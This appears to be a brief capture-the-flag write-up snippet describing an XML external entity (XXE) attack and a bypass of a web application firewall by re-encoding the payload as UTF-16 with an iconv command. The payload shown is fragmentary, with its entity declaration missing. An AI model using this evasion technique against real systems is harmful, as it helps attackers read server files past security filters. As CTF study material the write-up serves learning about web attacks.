Exploit [XML Eternal Entity Processing](https://www.owasp.org/index.php/XML_External_Entity_%28XXE%29_Processing), or XXE. This is complicated by the presence of, apparently, a WAF (Web Application Firewall), which catches keywords we need for XXE such as ENTITY and SYSTEM, among others. To bypass the WAF we convert our payload to UTF-16.

```

]>
<users><user><intro>&yee;;</intro></user></users>
```

```
$ iconv -f utf-8 -t utf-16be < xxe.xml > xxe-utf-16.xml
```

[More details](https://blog.vero.site/post/unagi)